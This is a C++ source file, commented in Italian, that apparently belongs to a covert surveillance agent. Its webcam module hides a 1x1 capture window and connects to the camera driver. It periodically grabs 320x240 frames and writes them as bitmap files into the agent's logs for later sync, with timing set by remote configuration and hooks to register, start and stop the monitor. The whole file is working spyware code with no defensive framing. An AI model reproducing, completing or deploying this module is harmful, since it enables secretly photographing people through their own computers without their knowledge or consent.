// XXX Dopo che ho messo l'agente nella configurazione testo che continui a loggare
// anche dopo la prima sync.

#include "Vfw.h" 

#define DELETE_CANCELLATION_POINT(x) if(x) { if (grab_cam) delete grab_cam; x=FALSE; ExitThread(0); }

class CWebCam  
{
public:

	CWebCam( HWND hWnd );
	virtual ~CWebCam();
	
public:
	void GrabFrame(void);
	
protected:
	bool Connect();
	void StartUp();

protected:
	HWND m_hWnd;
	HWND m_hWndCamera;
	bool m_bConnected;
};

typedef struct {
	DWORD start_int;
	DWORD cap_int;
} wcam_conf_struct;

#define WCCAPTURE_INTERVAL 10 // In secondi
#define WCSTARTUP_INTERVAL 10 // In decimi di secondo

DWORD wc_capture_interval = WCCAPTURE_INTERVAL;
DWORD wc_startup_interval = WCSTARTUP_INTERVAL; // Intervallo per l'inizializzazione

BOOL bPM_WebCamStarted = FALSE; // Flag che indica se il monitor e' attivo o meno
BOOL bPM_wccp = FALSE; // Semaforo per l'uscita del thread
HANDLE hWebCamThread = NULL;

// Ad ogni cattura di frame viene chiamato questo callback
LRESULT FrameCallbackProc(HWND hWnd, LPVIDEOHDR lpVideoHdr)
{
	BITMAPFILEHEADER bmhdr;
	BITMAPINFOHEADER bmi;
	HANDLE hf;

	ZeroMemory(&bmi, sizeof(bmi));
	bmi.biSize = sizeof(BITMAPINFOHEADER);
	bmi.biWidth = 320;
	bmi.biHeight = 240;
	bmi.biPlanes = 1;
	bmi.biBitCount = 24;
	bmi.biCompression = BI_RGB;
	bmi.biSizeImage = bmi.biWidth * bmi.biHeight *3;

	if (bmi.biSizeImage != lpVideoHdr->dwBytesUsed)
		return 0;

	bmhdr.bfType = 0x4d42;
	bmhdr.bfOffBits = sizeof(BITMAPFILEHEADER) + bmi.biSize;
	bmhdr.bfSize = bmhdr.bfOffBits + bmi.biSizeImage;
	bmhdr.bfReserved1 = 0; 
	bmhdr.bfReserved2 = 0; 

	hf = Log_CreateFile(PM_WEBCAMAGENT, "cam");
	Log_WriteFile(hf, (BYTE *)&bmhdr, sizeof(BITMAPFILEHEADER));
	Log_WriteFile(hf, (BYTE *)&bmi, sizeof(BITMAPINFOHEADER)); 
	Log_WriteFile(hf, (BYTE *)lpVideoHdr->lpData, bmi.biSizeImage);
	Log_CloseFile(hf);				

	return 0;
}

CWebCam::CWebCam( HWND hWnd ) : 
	m_hWnd(hWnd),
	m_bConnected(false),
	m_hWndCamera(NULL)
{
	StartUp();
}

CWebCam::~CWebCam()
{
	if ( m_bConnected )
		capDriverDisconnect( m_hWndCamera ); 		
	
	if ( m_hWndCamera )
		::DestroyWindow( m_hWndCamera );			
}

void CWebCam::StartUp()
{
	if ( m_hWnd ) {
		// Crea la finestra di capture
		m_hWndCamera = capCreateCaptureWindow (	"cpw", WS_CHILD, 0, 0, 1, 1, m_hWnd, 1);
		if ( m_hWndCamera ) {
			// Se riesce cerca di connettere la webcam
			m_bConnected = Connect();

			// Se non si connette distrugge la finestra
			if (!m_bConnected) {
				::DestroyWindow( m_hWndCamera );
				m_hWndCamera = NULL;
			}
		}
	}
}

bool CWebCam::Connect()
{
	BITMAPINFO bmi;

	if (!capDriverConnect( m_hWndCamera, 0 )) 
		return false;

	ZeroMemory(&bmi, sizeof(bmi)); 
	bmi.bmiHeader.biSize = sizeof(BITMAPINFOHEADER);
	bmi.bmiHeader.biWidth = 320;
	bmi.bmiHeader.biHeight = 240;
	bmi.bmiHeader.biPlanes = 1;
	bmi.bmiHeader.biBitCount = 24;
	bmi.bmiHeader.biCompression = BI_RGB;
		
	if (!capSetVideoFormat(	m_hWndCamera, &bmi, sizeof(bmi))) {
		capDriverDisconnect( m_hWndCamera );
		return false;
	}

	capSetCallbackOnFrame(m_hWndCamera, FrameCallbackProc);
	return true;
}

void CWebCam::GrabFrame()
{
	if ( m_bConnected ) 
		capGrabFrameNoStop( m_hWndCamera );
}




DWORD WINAPI CaptureWebCamThread(DWORD dummy)
{
	CWebCam *grab_cam = NULL; 
	DWORD i;

	LOOP {
		grab_cam = new CWebCam(GetDesktopWindow());

		// Prima di effettuare la cattura aspetta
		// che la webcam sia inizializzata
		for (i=0; i<wc_startup_interval; i++) {
			// Se esce qui deve anche cancellare l'oggetto
			DELETE_CANCELLATION_POINT(bPM_wccp);
			Sleep(100); // In decimi di secondo...
		}

		// Cattura un frame
		if (grab_cam) {
			grab_cam->GrabFrame();
			delete grab_cam;
			grab_cam = NULL;
		}

		// Ogni mezzo secondo fa il controllo
		// se terminare il thread.
		for (i=0; i<wc_capture_interval*2; i++) {
			CANCELLATION_POINT(bPM_wccp);
			Sleep(500); // Mezzo secondo
		}
	}
}


DWORD __stdcall PM_WebCamStartStop(BOOL bStartFlag)
{
	DWORD dummy;

	// Se l'agent e' gia' nella condizione desiderata
	// non fa nulla.
	if (bPM_WebCamStarted == bStartFlag)
		return 0;

	bPM_WebCamStarted = bStartFlag;

	if (bStartFlag) {
		// Crea il thread che esegue il grab 
		hWebCamThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)CaptureWebCamThread, NULL, 0, &dummy);
	} else {
		// All'inizio non si stoppa perche' l'agent e' gia' nella condizione
		// stoppata (bPM_WebCamStarted = bStartFlag = FALSE)
		QUERY_CANCELLATION(hWebCamThread, bPM_wccp);
	}

	return 1;
}


DWORD __stdcall PM_WebCamInit(BYTE *conf_ptr, BOOL bStartFlag)
{
	wcam_conf_struct *wcam_conf;

	// Setta il capture interval della WebCam
	if (conf_ptr) {
		wcam_conf = (wcam_conf_struct *)conf_ptr;
		wc_capture_interval = wcam_conf->cap_int;
		wc_startup_interval = wcam_conf->start_int;
	} else {
		wc_capture_interval = WCCAPTURE_INTERVAL;
		wc_startup_interval = WCSTARTUP_INTERVAL;
	}
	PM_WebCamStartStop(bStartFlag);
	return 1;
}


void PM_WebCamRegister()
{
	// Non ha nessuna funzione di Dispatch
	AM_MonitorRegister(PM_WEBCAMAGENT, NULL, (BYTE *)PM_WebCamStartStop, (BYTE *)PM_WebCamInit, NULL);

	// Inizialmente i monitor devono avere una configurazione di default nel caso
	// non siano referenziati nel file di configurazione (partono comunque come stoppati).
	PM_WebCamInit(NULL, FALSE);
}